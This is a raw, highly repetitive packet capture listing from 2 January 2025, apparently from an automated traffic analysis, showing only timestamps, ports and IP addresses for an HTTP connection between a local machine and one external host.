                                                                            Jan 2, 2025 20:34:50.709340096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.709348917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.709353924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.709366083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.709400892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.710135937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.710148096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.710159063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.710185051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.710202932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.710263014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.710299969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.710331917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.710371017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.710433006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.710479975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.711699963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.711714029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.711726904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.711738110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.711766958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.711792946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.712506056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.712518930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.712531090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.712560892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.712594032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.712611914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.712641954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.712651014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.712651968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.712692022 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.714090109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.714099884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.714139938 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.714180946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.714199066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.714221001 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.714231968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.715167999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.715214968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.715226889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.715239048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.715250969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.715266943 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.715291023 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.716681957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.716736078 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.716741085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.716751099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.716763020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.716773033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.716777086 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.716799974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.716815948 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.717222929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.717262030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.717272997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.717288017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.717315912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.718009949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.718034983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.718044996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.718061924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.718097925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.718195915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.718208075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.718240976 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.719877958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.719919920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.719940901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.719950914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.719961882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.719973087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.719983101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.720004082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.720406055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.720432043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.720443010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.720452070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.720453978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.720479012 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.720504045 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.722147942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.722158909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.722171068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.722179890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.722196102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.722198009 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.722224951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.722245932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.722888947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.722908974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.722919941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.722930908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.722934008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.722954988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.722978115 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.723727942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.723741055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.723751068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.723773003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.723798990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.723880053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.723890066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.723901033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.723923922 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.723937988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.725310087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.725321054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.725331068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.725358963 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.725384951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.725980043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.725997925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.726007938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.726022959 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.726049900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.726102114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.726145983 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.726146936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.726156950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.726186991 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.727756023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.727766037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.727782011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.727801085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.727806091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.727811098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.727828026 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.727857113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.728471041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.728490114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.728499889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.728514910 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.728537083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.729105949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.729127884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.729136944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.729150057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.729178905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.729399920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.729412079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.729420900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.729444027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.729461908 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.730797052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.730808020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.730825901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.730834007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.730866909 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.730894089 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.731730938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.731741905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.731753111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.731784105 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.731816053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.731817961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.731827021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.731837034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.731859922 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.731884003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.733165026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.733187914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.733218908 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.733238935 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.733316898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.733355045 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.733366966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.733376026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.733401060 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.733417034 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.734024048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.734071970 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.734074116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.734083891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.734092951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.734112024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.734138012 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.735714912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.735724926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.735737085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.735755920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.735775948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.735785007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.735788107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.735797882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.735816002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.735838890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.736347914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.736371040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.736385107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.736392975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.736394882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.736416101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.736435890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.737237930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.737257004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.737266064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.737284899 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.737310886 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.737494946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.737505913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.737515926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.737539053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.737560034 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.790070057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.790085077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.790096998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.790108919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.790118933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.790131092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.790143013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.790175915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.790227890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.791326046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.791383028 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.791441917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.791452885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.791464090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.791474104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.791486025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.791495085 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.791496992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.791510105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.791527033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.791548967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.793714046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.793724060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.793735027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.793751955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.793762922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.793773890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.793775082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.793785095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.793795109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.793821096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.793839931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.796379089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.796402931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.796416044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.796425104 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.796427011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.796439886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.796443939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.796452045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.796464920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.796468973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.796499014 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.796511889 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.797132015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.797146082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.797166109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.797175884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.797177076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.797188997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.797199011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.797199011 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.797209978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.797220945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.797235966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.797256947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.799408913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.799457073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.799496889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.799506903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.799516916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.799529076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.799537897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.799539089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.799551010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.799561977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.799571991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.799572945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.799616098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.803476095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.803487062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.803498030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.803509951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.803528070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.803559065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.803596973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.803611040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.803622961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.803632021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.803637028 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.803668976 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.804805040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.804815054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.804826975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.804837942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.804860115 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.804867029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.804883003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.804888964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.804899931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.804902077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.804910898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.804922104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.804943085 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.804965973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.807346106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.807357073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.807369947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.807379961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.807389975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.807410002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.807437897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.807446957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.807456017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.807462931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.807467937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.807476997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.807492018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.807524920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.812247038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.812263966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.812328100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.812350988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.812362909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.812381029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.812395096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.812402964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.812413931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.812424898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.812426090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.812443018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.812472105 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.813467026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.813476086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.813522100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.813544035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.813555002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.813565969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.813576937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.813585043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.813587904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.813599110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.813606024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.813638926 CET4973080192.168.2.447.254.187.72
